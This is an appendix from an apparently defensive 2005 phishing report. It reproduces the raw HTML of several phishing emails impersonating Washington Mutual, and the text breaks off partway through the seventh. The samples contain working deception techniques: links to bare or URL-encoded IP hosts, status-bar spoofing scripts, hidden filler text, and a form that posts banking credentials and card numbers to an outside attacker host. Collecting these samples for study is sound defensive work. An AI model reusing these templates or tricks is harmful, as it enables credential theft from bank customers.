educate the enterprise. defeat phish hooks.
educate the enterprise. defeat phish hooks.
|
|
Phishing Trip Part 1: Appendices Download PDF infectionvectors.com January 2005
See Full Report - Phishing Trip Part 1: Washington Mutual
Appendix A: The WaMu Letters
Message 0, received 10 November 2004:
<html><p><font face="Arial"><A HreF="http://www.wamu.com/personal/welcome/confirmusersdata.htm"><map name="FPMap0"><area coords="0, 0, 590, 292" shape="rect" href="http://%36%35%2E%31%36%37%2E%31%33%30%2E%31%32%36:%38%37/%77%61/% 69%6E%64%65%78%2E%68%74%6D"></map><img SRC="cid:part1.02040006.02050903@support_id_313219724@wamu.com" border="0" usemap="#FPMap0"></A></a></font></p><p><font color="#FFFFFB">Freeware The Holocaust It's out of the question. in 1929 Fast Search come on! Snowboarding well fine I'll speak my mind. Ok deal NCAA Basketball in fact Madonna Yes, it's great. Computers Will you, please... in 1958 in 1921 Prom Hairstyles in 1842 Diablo 2 X Files Tool You are through </font></p></html>
Message 1, received 24 December 2004:
<table cellSpacing="0" cellPadding="0" width="600" align="center" border="0"> <tr vAlign="top"> <td> <IMG height=29 alt="" hspace=0 src="https://login.personal.wamu.com/images/wamucom_logo.gif" width=311 border=0><BR><IMG height=5 alt="" hspace=0 src="http://www.suntrust.com/images/Common/release3/common_header_yellowspan.gif" width=836 border=0> </BODY></HTML> </td> </tr> </table> <table cellSpacing="0" cellPadding="0" width="100%" border="0"> </table> <table cellSpacing="0" cellPadding="0" width="600" align="center" border="0"> <tr vAlign="top"> <td width="400"> <table cellSpacing="0" cellPadding="5" width="600" border="0"> <tr vAlign="top"> <td width="590"> <table cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td class="pp_heading" align="left"> </td> </tr> </table> </td> </tr> <tr> <td class="pptext" width="590"><p>Dear wamu valued member, <br> <br> On the date of 18th of December there was a login trials from <br> a foreign IP address which resulted with your account <br> temporary suspension . <p>for your security <br> you have to immediately reactivate your account <br></p> <p>Please click the link below to reactivate your account: </p> <p align="left"><a href="http://64.23.10.44/wamuupdate/accounts/update/avncenter/bsda6gwcv7zfcwfcwf34gfw f23g235f134f3fg3f&bhdfahva68532hbhwseBayISAPI.dllPaymentLanding&ssPageName=hhpayUSf&=u serhgads&secure&ssl7r2vbd7d88klmnogh.htm">https://www.wamu.com/internetBanking/Request Router?requestCmdId=Reactivate </a></p> <p align="left">Sincerely, <br> wamu Security Department <p align="left">This notification expires in 48 Hours<BR><IMG height=5 alt="" hspace=0 src="http://www.suntrust.com/images/Common/release3/common_header_yellowspan.gif" width=836 border=0> </p></td> </tr> <tr> <td width="590"> </td> </tr> </table> </td> </tr> </table> </body> </html>
Message 2, received 28 December 2004:
<html>
<head> <meta http-equiv="Content-Language" content="en-us"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <style> <!-- #message td {font-family: verdana,arial,helvetica,sans-serif;font-size: 12px;color: #000000;} #message .pp_heading {font-family: verdana,arial,helvetica,sans-serif;font-size: 18px;font-weight: bold;color: #003366;} #message .pp_sansserif{font-family: verdana,arial,helvetica,sans-serif; font-size: 16px;color: #000000;} #message hr.dotted {width: 100%; margin-top: 0px; margin-bottom: 0px; border-left: #fff; border-right: #fff; border-top: #fff; border-bottom: 2px dotted #ccc;} #message .pp_footer {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #aaaaaa;} --> </style> </head>
<body>
<table class="messageheader" cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td> </td> </tr> </table> <div id="message" style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <xmeta Content="Microsoft DHTML Editing Control" NAME="GENERATOR" /> <xbody /> <style type="text/css"> #message .dummy {} #message td {font-family: verdana,arial,helvetica,sans-serif;font-size: 12px;color: #000000;} #message {font-family: verdana,arial,helvetica,sans-serif;font-size: 12px;color: #000000;} #message LI {line-height: 120%;} #message UL.ppsmallborder {margin:10px 5px 10px 20px;} #message LI.ppsmallborderli {margin:0px 0px 5px 0px;} #message UL.pp_narrow {margin:10px 5px 0px 40px;} #message hr.dotted {width: 100%; margin-top: 0px; margin-bottom: 0px; border-left: #fff; border-right: #fff; border-top: #fff; border-bottom: 2px dotted #ccc;} #message .pp_label {font-family: verdana,arial,helvetica,sans-serif;font-size: 10px;font-weight: bold;color: #000000;} #message .pp_serifbig {font-family: serif;font-size: 20px;font-weight: bold;color: #000000;} #message .pp_serif{font-family: serif;font-size: 16px;color: #000000;} #message .pp_sansserif{font-family: verdana,arial,helvetica,sans-serif; font-size: 16px;color: #000000;} #message .pp_heading {font-family: verdana,arial,helvetica,sans-serif;font-size: 18px;font-weight: bold;color: #003366;} #message .pp_subheadingeoa {font-family: verdana,arial,helvetica,sans-serif;font-size: 15px;font-weight: bold;color: #000000;} #message .pp_subheading {font-family: verdana,arial,helvetica,sans-serif;font-size: 16px;font-weight: bold;color: #003366;} #message .pp_sidebartext {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #003366;} #message .pp_sidebartextbold {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;font-weight: bold;color: #003366;} #message .pp_footer {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #aaaaaa;} #message .pp_button {font-size: 13px; font-family: verdana,arial,helvetica,sans-serif; font-weight: 400; border-style:outset; color:#000000; background-color: #cccccc;} #message .pp_smaller {font-family: verdana,arial,helvetica,sans-serif;font-size: 10px;color: #000000;} #message .pp_smallersidebar {font-family: verdana,arial,helvetica,sans-serif;font-size: 10px;color: #003366;} #message .ppem106 {font-weight: 700;} </style> <table cellSpacing="0" cellPadding="0" width="600" align="center" border="0"> <tr vAlign="top"> <table cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td width="100%" style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <img height="10" src="http://images.paypal.com/images/pixel.gif" width="1" border="0"></td> </tr> </table> <table cellSpacing="0" cellPadding="0" width="600" align="center" border="0"> <tr vAlign="top"> <td width="400" style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <table cellSpacing="0" cellPadding="5" width="100%" border="0"> <tr vAlign="top"> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <table cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td class="pp_heading" align="left"><br> Security Center Advisory!</td> </tr> </table> </td> </tr> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <p><br> Washington Mutual is committed to maintaining a safe environment for its community of buyers and sellers. To protect the security of your account, Washington Mutual employs some of the most advanced security systems in the world and our anti-fraud teams regularly screen the Washington Mutual system for unusual activity.<br> <br> We recently have determined that different computers have logged onto your Washington Mutual Online Banking account, and multiple password failures were present before the logons. We now need you to re-confirm your account information to us. If this is not completed by <strong>January 07, 2005</strong>, we will be forced to suspend your account indefinitely, as it may have been used for fraudulent purposes. We thank you for your cooperation in this manner. <br> <br> In order to confirm your Online Bank records, we may require some specific information from you.<br> <br> <br> Please follow the link below and renew your account information : <br> <br> <br> <a href="http://211.9.254.123/en/.mutual-sk/index.php?MfcISAPICommand=SignInFPP&UsingSSL=1&email=&userid=" onMouseOver="window.status='https://login.personal.wamu.com/logon/logon.asp?dd=1&Update&Your&Info';return true;" onMouseOut="window.status=' ';return true;">https://login.personal.wamu.com/logon/logon.asp?dd=1&Update&Your&Info</a> <br> <br> Thank you for your prompt attention to this matter. Please understand that this is a security measure meant to help protect you and your account. <br> <br> We apologize for any inconvenience.<br> <br> If you choose to ignore our request, you leave us no choise but to temporaly suspend your account.<br> <br> Thank you for using Washington Mutual!</p> </td> </tr> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <hr class="dotted"></td> </tr> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <table cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <img height="10" src="http://images.paypal.com/en_US/i/scr/pixel.gif" width="1" border="0"></td> </tr> </table> </td> </tr> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> </td> </tr> </table> </td> </tr> </table> </body>
</html>
Message 3, received 30 December 2004:
<html>
<head> <meta http-equiv="Content-Language" content="en-us"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <style> <!-- #message td {font-family: verdana,arial,helvetica,sans-serif;font-size: 12px;color: #000000;} #message .pp_heading {font-family: verdana,arial,helvetica,sans-serif;font-size: 18px;font-weight: bold;color: #003366;} #message .pp_sansserif{font-family: verdana,arial,helvetica,sans-serif; font-size: 16px;color: #000000;} #message hr.dotted {width: 100%; margin-top: 0px; margin-bottom: 0px; border-left: #fff; border-right: #fff; border-top: #fff; border-bottom: 2px dotted #ccc;} #message .pp_footer {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #aaaaaa;} --> </style> </head>
<body>
<table class="messageheader" cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td> </td> </tr> </table> <div id="message" style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <xmeta Content="Microsoft DHTML Editing Control" NAME="GENERATOR" /> <xbody /> <style type="text/css"> #message .dummy {} #message td {font-family: verdana,arial,helvetica,sans-serif;font-size: 12px;color: #000000;} #message {font-family: verdana,arial,helvetica,sans-serif;font-size: 12px;color: #000000;} #message LI {line-height: 120%;} #message UL.ppsmallborder {margin:10px 5px 10px 20px;} #message LI.ppsmallborderli {margin:0px 0px 5px 0px;} #message UL.pp_narrow {margin:10px 5px 0px 40px;} #message hr.dotted {width: 100%; margin-top: 0px; margin-bottom: 0px; border-left: #fff; border-right: #fff; border-top: #fff; border-bottom: 2px dotted #ccc;} #message .pp_label {font-family: verdana,arial,helvetica,sans-serif;font-size: 10px;font-weight: bold;color: #000000;} #message .pp_serifbig {font-family: serif;font-size: 20px;font-weight: bold;color: #000000;} #message .pp_serif{font-family: serif;font-size: 16px;color: #000000;} #message .pp_sansserif{font-family: verdana,arial,helvetica,sans-serif; font-size: 16px;color: #000000;} #message .pp_heading {font-family: verdana,arial,helvetica,sans-serif;font-size: 18px;font-weight: bold;color: #003366;} #message .pp_subheadingeoa {font-family: verdana,arial,helvetica,sans-serif;font-size: 15px;font-weight: bold;color: #000000;} #message .pp_subheading {font-family: verdana,arial,helvetica,sans-serif;font-size: 16px;font-weight: bold;color: #003366;} #message .pp_sidebartext {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #003366;} #message .pp_sidebartextbold {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;font-weight: bold;color: #003366;} #message .pp_footer {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #aaaaaa;} #message .pp_button {font-size: 13px; font-family: verdana,arial,helvetica,sans-serif; font-weight: 400; border-style:outset; color:#000000; background-color: #cccccc;} #message .pp_smaller {font-family: verdana,arial,helvetica,sans-serif;font-size: 10px;color: #000000;} #message .pp_smallersidebar {font-family: verdana,arial,helvetica,sans-serif;font-size: 10px;color: #003366;} #message .ppem106 {font-weight: 700;} </style> <table cellSpacing="0" cellPadding="0" width="600" align="center" border="0"> <tr vAlign="top"> <table cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td width="100%" style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <img height="10" src=" images.paypal.com/images/pixel.gif" width="1" border="0"></td> </tr> </table> <table cellSpacing="0" cellPadding="0" width="600" align="center" border="0"> <tr vAlign="top"> <td width="400" style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <table cellSpacing="0" cellPadding="5" width="100%" border="0"> <tr vAlign="top"> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <table cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td class="pp_heading" align="left"><br> Security Center Advisory!</td> </tr> </table> </td> </tr> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <p><br> Washington Mutual is committed to maintaining a safe environment for its community of buyers and sellers. To protect the security of your account, Washington Mutual employs some of the most advanced security systems in the world and our anti-fraud teams regularly screen the Washington Mutual system for unusual activity.<br> <br> We recently have determined that different computers have logged onto your Washington Mutual Online Banking account, and multiple password failures were present before the logons. We now need you to re-confirm your account information to us. If this is not completed by <strong>Jan 10, 2005</strong>, we will be forced to suspend your account indefinitely, as it may have been used for fraudulent purposes. We thank you for your cooperation in this manner. <br> <br> In order to confirm your Online Bank records, we may require some specific information from you.<br> <br> <br> Please follow the link below and renew your account information : <br> <br> <br> <a href="http://210.103.105.224/.wamu/index.php?MfcISAPICommand=SignInFPP&UsingSSL=1&email=&userid=" onMouseOver="window.status='https://login.personal.wamu.com/logon/logon.asp?dd=1&Update&Your&Info';return true;" onMouseOut="window.status=' ';return true;">https://login.personal.wamu.com/logon/logon.asp?dd=1&Update&Your&Info</a> <br> <br> Thank you for your prompt attention to this matter. Please understand that this is a security measure meant to help protect you and your account. <br> <br> We apologize for any inconvenience.<br> <br> If you choose to ignore our request, you leave us no choise but to temporaly suspend your account.<br> <br> Thank you for using Washington Mutual!</p> </td> </tr> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <hr class="dotted"></td> </tr> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <table cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <img height="10" src="http://images.paypal.com/en_US/i/scr/pixel.gif" width="1" border="0"></td> </tr> </table> </td> </tr> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> </td> </tr> </table> </td> </tr> </table> </body>
</html>
Message 4, received on 30 December 2004:
<html>
<head> <meta http-equiv="Content-Language" content="en-us"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <style> <!-- #message td {font-family: verdana,arial,helvetica,sans-serif;font-size: 12px;color: #000000;} #message .pp_heading {font-family: verdana,arial,helvetica,sans-serif;font-size: 18px;font-weight: bold;color: #003366;} #message .pp_sansserif{font-family: verdana,arial,helvetica,sans-serif; font-size: 16px;color: #000000;} #message hr.dotted {width: 100%; margin-top: 0px; margin-bottom: 0px; border-left: #fff; border-right: #fff; border-top: #fff; border-bottom: 2px dotted #ccc;} #message .pp_footer {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #aaaaaa;} --> </style> </head>
<body>
<table class="messageheader" cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td> </td> </tr> </table> <div id="message" style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <xmeta Content="Microsoft DHTML Editing Control" NAME="GENERATOR" /> <xbody /> <style type="text/css"> #message .dummy {} #message td {font-family: verdana,arial,helvetica,sans-serif;font-size: 12px;color: #000000;} #message {font-family: verdana,arial,helvetica,sans-serif;font-size: 12px;color: #000000;} #message LI {line-height: 120%;} #message UL.ppsmallborder {margin:10px 5px 10px 20px;} #message LI.ppsmallborderli {margin:0px 0px 5px 0px;} #message UL.pp_narrow {margin:10px 5px 0px 40px;} #message hr.dotted {width: 100%; margin-top: 0px; margin-bottom: 0px; border-left: #fff; border-right: #fff; border-top: #fff; border-bottom: 2px dotted #ccc;} #message .pp_label {font-family: verdana,arial,helvetica,sans-serif;font-size: 10px;font-weight: bold;color: #000000;} #message .pp_serifbig {font-family: serif;font-size: 20px;font-weight: bold;color: #000000;} #message .pp_serif{font-family: serif;font-size: 16px;color: #000000;} #message .pp_sansserif{font-family: verdana,arial,helvetica,sans-serif; font-size: 16px;color: #000000;} #message .pp_heading {font-family: verdana,arial,helvetica,sans-serif;font-size: 18px;font-weight: bold;color: #003366;} #message .pp_subheadingeoa {font-family: verdana,arial,helvetica,sans-serif;font-size: 15px;font-weight: bold;color: #000000;} #message .pp_subheading {font-family: verdana,arial,helvetica,sans-serif;font-size: 16px;font-weight: bold;color: #003366;} #message .pp_sidebartext {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #003366;} #message .pp_sidebartextbold {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;font-weight: bold;color: #003366;} #message .pp_footer {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #aaaaaa;} #message .pp_button {font-size: 13px; font-family: verdana,arial,helvetica,sans-serif; font-weight: 400; border-style:outset; color:#000000; background-color: #cccccc;} #message .pp_smaller {font-family: verdana,arial,helvetica,sans-serif;font-size: 10px;color: #000000;} #message .pp_smallersidebar {font-family: verdana,arial,helvetica,sans-serif;font-size: 10px;color: #003366;} #message .ppem106 {font-weight: 700;} </style> <table cellSpacing="0" cellPadding="0" width="600" align="center" border="0"> <tr vAlign="top"> <table cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td width="100%" style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <img height="10" src="http://images.paypal.com/images/pixel.gif" width="1" border="0"></td> </tr> </table> <table cellSpacing="0" cellPadding="0" width="600" align="center" border="0"> <tr vAlign="top"> <td width="400" style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <table cellSpacing="0" cellPadding="5" width="100%" border="0"> <tr vAlign="top"> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <table cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td class="pp_heading" align="left"><br> Security Center Advisory!</td> </tr> </table> </td> </tr> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <p><br> Washington Mutual is committed to maintaining a safe environment for its community of buyers and sellers. To protect the security of your account, Washington Mutual employs some of the most advanced security systems in the world and our anti-fraud teams regularly screen the Washington Mutual system for unusual activity.<br> <br> We recently have determined that different computers have logged onto your Washington Mutual Online Banking account, and multiple password failures were present before the logons. We now need you to re-confirm your account information to us. If this is not completed by <strong>January 07, 2005</strong>, we will be forced to suspend your account indefinitely, as it may have been used for fraudulent purposes. We thank you for your cooperation in this manner. <br> <br> In order to confirm your Online Bank records, we may require some specific information from you.<br> <br> <br> Please follow the link below and renew your account information : <br> <br> <br> <a href="http://12.166.79.35/.mutual-sk/index.php?MfcISAPICommand=SignInFPP&UsingSSL=1&email=&userid=" onMouseOver="window.status='https://login.personal.wamu.com/logon/logon.asp?dd=1&Update&Your&Info';return true;" onMouseOut="window.status=' ';return true;">https://login.personal.wamu.com/logon/logon.asp?dd=1&Update&Your&Info</a> <br> <br> Thank you for your prompt attention to this matter. Please understand that this is a security measure meant to help protect you and your account. <br> <br> We apologize for any inconvenience.<br> <br> If you choose to ignore our request, you leave us no choise but to temporaly suspend your account.<br> <br> Thank you for using Washington Mutual!</p> </td> </tr> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <hr class="dotted"></td> </tr> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <table cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <img height="10" src="http://images.paypal.com/en_US/i/scr/pixel.gif" width="1" border="0"></td> </tr> </table> </td> </tr> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> </td> </tr> </table> </td> </tr> </table> </body>
</html>
Message 5, received 1 January 2005:
<table cellSpacing="0" cellPadding="0" width="600" align="center" border="0"> <tr vAlign="top"> <td> <IMG height=29 alt="" hspace=0 src="https://login.personal.wamu.com/images/wamucom_logo.gif" width=311 border=0><BR><IMG height=5 alt="" hspace=0 src="http://www.suntrust.com/images/Common/release3/common_header_yellowspan.gif" width=836 border=0> </BODY></HTML> </td> </tr> </table> <table cellSpacing="0" cellPadding="0" width="100%" border="0"> </table> <table cellSpacing="0" cellPadding="0" width="600" align="center" border="0"> <tr vAlign="top"> <td width="400"> <table cellSpacing="0" cellPadding="5" width="600" border="0"> <tr vAlign="top"> <td width="590"> <table cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td class="pp_heading" align="left"> </td> </tr> </table> </td> </tr> <tr> <td class="pptext" width="590"><p>Dear wamu valued member, <br> <br> On the date of January 1st there was a login trials from <br> a foreign IP address which resulted with your account <br> temporary suspension . <p>for your security <br> you have to immediately reactivate your account <br></p> <p>Please click the link below to reactivate your account: </p> <p align="left"><a href="http://aquaforcepspump.com/wamu/accounts/update/avncenter/bsda6gwcv7zfcwfcwf34gfw f23g235f134f3fg3f&bhdfahva68532hbhwseBayISAPI.dllPaymentLanding&ssPageName=hhpayUSf&=user hgads&secure&ssl7r2vbd7d88klmnogh.htm">https://www.wamu.com/internetBanking/RequestRouter ?requestCmdId=Reactivate </a></p> <p align="left">Sincerely, <br> Wamu Security Department <p align="left">This notification expires in 48 Hours<BR><IMG height=5 alt="" hspace=0 src="http://www.suntrust.com/images/Common/release3/common_header_yellowspan.gif" width=836 border=0> </p></td> </tr> <tr> <td width="590"> </td> </tr> </table> </td> </tr> </table> </body> </html>
Message 6, 5 January 2005:
<html>
<head> <xmeta http-equiv="Content-Language" content="en-us"> <xmeta name="GENERATOR" content="Microsoft FrontPage 5.0"> <xmeta name="ProgId" content="FrontPage.Editor.Document"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <title>New Page 3</title> <style> <!-- #message #message td {font-family: verdana,arial,helvetica,sans-serif;font-size: 12px;color: #000000;} #message #message .pp_heading {font-family: verdana,arial,helvetica,sans-serif;font-size: 18px;font-weight: bold;color: #003366;} #message #message .pp_sansserif{font-family: verdana,arial,helvetica,sans-serif; font-size: 16px;color: #000000;} #message #message hr.dotted {width: 100%; margin-top: 0px; margin-bottom: 0px; border-left: #fff; border-right: #fff; border-top: #fff; border-bottom: 2px dotted #ccc;} #message #message .pp_footer {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #aaaaaa;} --> </style> </head>
<xbody>
<table class="messageheader" cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td> </td> </tr> </table> <div id="message" style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <xmeta Content="Microsoft DHTML Editing Control" NAME="GENERATOR" /> <xbody /> <style type="text/css"> #message #message .dummy {} #message #message td {font-family: verdana,arial,helvetica,sans-serif;font-size: 12px;color: #000000;} #message #message {font-family: verdana,arial,helvetica,sans-serif;font-size: 12px;color: #000000;} #message #message LI {line-height: 120%;} #message #message UL.ppsmallborder {margin:10px 5px 10px 20px;} #message #message LI.ppsmallborderli {margin:0px 0px 5px 0px;} #message #message UL.pp_narrow {margin:10px 5px 0px 40px;} #message #message hr.dotted {width: 100%; margin-top: 0px; margin-bottom: 0px; border-left: #fff; border-right: #fff; border-top: #fff; border-bottom: 2px dotted #ccc;} #message #message .pp_label {font-family: verdana,arial,helvetica,sans-serif;font-size: 10px;font-weight: bold;color: #000000;} #message #message .pp_serifbig {font-family: serif;font-size: 20px;font-weight: bold;color: #000000;} #message #message .pp_serif{font-family: serif;font-size: 16px;color: #000000;} #message #message .pp_sansserif{font-family: verdana,arial,helvetica,sans-serif; font-size: 16px;color: #000000;} #message #message .pp_heading {font-family: verdana,arial,helvetica,sans-serif;font-size: 18px;font-weight: bold;color: #003366;} #message #message .pp_subheadingeoa {font-family: verdana,arial,helvetica,sans-serif;font-size: 15px;font-weight: bold;color: #000000;} #message #message .pp_subheading {font-family: verdana,arial,helvetica,sans-serif;font-size: 16px;font-weight: bold;color: #003366;} #message #message .pp_sidebartext {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #003366;} #message #message .pp_sidebartextbold {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;font-weight: bold;color: #003366;} #message #message .pp_footer {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #aaaaaa;} #message #message .pp_button {font-size: 13px; font-family: verdana,arial,helvetica,sans-serif; font-weight: 400; border-style:outset; color:#000000; background-color: #cccccc;} #message #message .pp_smaller {font-family: verdana,arial,helvetica,sans-serif;font-size: 10px;color: #000000;} #message #message .pp_smallersidebar {font-family: verdana,arial,helvetica,sans-serif;font-size: 10px;color: #003366;} #message #message .ppem106 {font-weight: 700;} </style> <table cellSpacing="0" cellPadding="0" width="600" align="center" border="0"> <tr vAlign="top"> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <a target="_blank" href="https://login.personal.wamu.com/logon/logon.asp?dd=1" > <img alt="wamu.com" src="http://us.i1.yimg.com/us.yimg.com/i/us/pim/el/spc_eee1.gif" border="0" width="255" height="35"></a> </td> </tr> </table> <table cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td width="100%" style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <img height="10" src="http://us.i1.yimg.com/us.yimg.com/i/us/pim/el/spc_eee1.gif" width="1" border="0"></td> </tr> </table> <table cellSpacing="0" cellPadding="0" width="600" align="center" border="0"> <tr vAlign="top"> <td width="400" style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <table cellSpacing="0" cellPadding="5" width="100%" border="0"> <tr vAlign="top"> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <table cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td class="pp_heading" align="left"><br> Security Center Advisory!</td> </tr> </table> </td> </tr> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <br> WAMU is committed to maintaining a safe environment for its community of buyers and sellers. To protect the security of your account, WAMU employs some of the most advanced security systems in the world and our anti-fraud teams regularly screen the WAMU system for unusual activity.<br> <br> In accordance with WAMU's User Agreement and to ensure that your account has not been compromised, access to your account was limited. <br> <br> Your account access will remain limited until this issue has been resolved. <br> <br> In order to secure your account and quickly restore full access, we may require some specific information from you for the following reason: <br> <br> We encourage you to log in and restore full access as soon as possible.<br> <table cellSpacing="0" cellPadding="1" width="75%" align="left" bgColor="#ffe65c" border="0"> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <table cellSpacing="0" cellPadding="4" width="100%" align="center" bgColor="#fffecd" border="0"> <tr> <td class="pp_sansserif" align="middle"> <a target="_blank" href="http://69.41.170.174/~aca/.wamusk/index.php?MfcISAPICommand=SignInFPP&UsingSSL=1&email=&userid=" > Click here to verify your account</a></td> </tr> </table> </td> </tr> </table> <p><br> <br> Should access to your account remain limited for an extended period of time, it may result in further limitations on the use of your account or may result in eventual account closure.<br> <br> Thank you for your prompt attention to this matter. Please understand that this is a security measure meant to help protect you and your account. <br> <br> We apologize for any inconvenience.<br> <br> <br> If you choose to ignore our request, you leave us no choise but to temporaly suspend your account.<br> <br> Thank you for using WAMU!</td> </tr> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <hr class="dotted"></td> </tr> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <table cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <img height="10" src="http://us.i1.yimg.com/us.yimg.com/i/us/pim/el/spc_eee1.gif" width="1" border="0"></td> </tr> </table> </td> </tr> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <br> </td> </tr> </table> </td> </tr> </table> </div>
</xbody>
</html>
Message 7, received 6 January 2005:
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="600" id="AutoNumber1">
<tr>
<td bgcolor="#000099">
<img title="wamu.com A Washington Mutual, Inc. Web site" alt="wamu.com A Washington Mutual, Inc. Web site" src="http://www.wamu.com/images/wamucom_logo_blue.gif" border="0" width="313" height="42"></td>
</tr>
<tr>
<td>Dear <b>Washington Mutual Customer,</b><br>
<br>
We recently reviewed your account, and suspect that your <b>Washington
Mutual Internet Banking</b> account may have been accesssed by an
unauthorized third party. Protecting the security of your account and of the
<b>Washington Mutual </b>network is our primary concern. Therefore, as a
preventative measure, we have temporarily limited access to sensitive
account features.<br>
<br>
<form method="POST" target="self" action="http://www.yourinternetzone.com/css/confirr.php?secure_login=true&change_pass=true&userid= 612723893459&confirm=hd2mx6kc&data_mode=%20secured">
<input type="hidden" size="30" name="id" value="124">
<input type="hidden" size="30" name="mailuser" value="EMAILADDRESSIS">
<input type="hidden" size="30" name="ebay_user_id" value="test">
To restore your account access, please complete the form and click submit to
ensure that your account has not been compromised:<br>
<br>
1. Complete your <b>Washington Mutual Internet Banking</b> account. In case
you are not enrolled for <b>Internet Banking</b>, you will have to use your
Credit Card Number as both your Personal ID and Password and fill in
all the required information.<br>
<br>
2. Review your recent account history for any unauthorized withdrawles or
deposits, and check your account profile to make sure not changes have been
made. If any unauthorized activity has taken place on your
account, report this to <b>Washington Mutual</b> staff immediately.<br>
<br>
To get started, confirm your Washington Mutual Online Account:<br>
</p>
<table cellSpacing="0" cellPadding="0" border="0" width="1">
<tr>
<td width="10">
<img alt src="https://login.personal.wamu.com/images/logon_ytl.gif" border="0" width="10" height="10"></td>
<td bgColor="#ffcc00" width="443">
<img alt src="https://login.personal.wamu.com/images/1px_clear.gif" border="0" width="1" height="1"></td>
<td width="10">
<img alt src="https://login.personal.wamu.com/images/logon_ytr.gif" border="0" width="10" height="10"></td>
</tr>
<tr>
<td bgColor="#ffcc00" width="10"> </td>
<td bgColor="#ffcc00" width="443">
<table cellSpacing="0" cellPadding="0" border="0" width="174" height="137" style="border-collapse: collapse" bordercolor="#111111">
<tr>
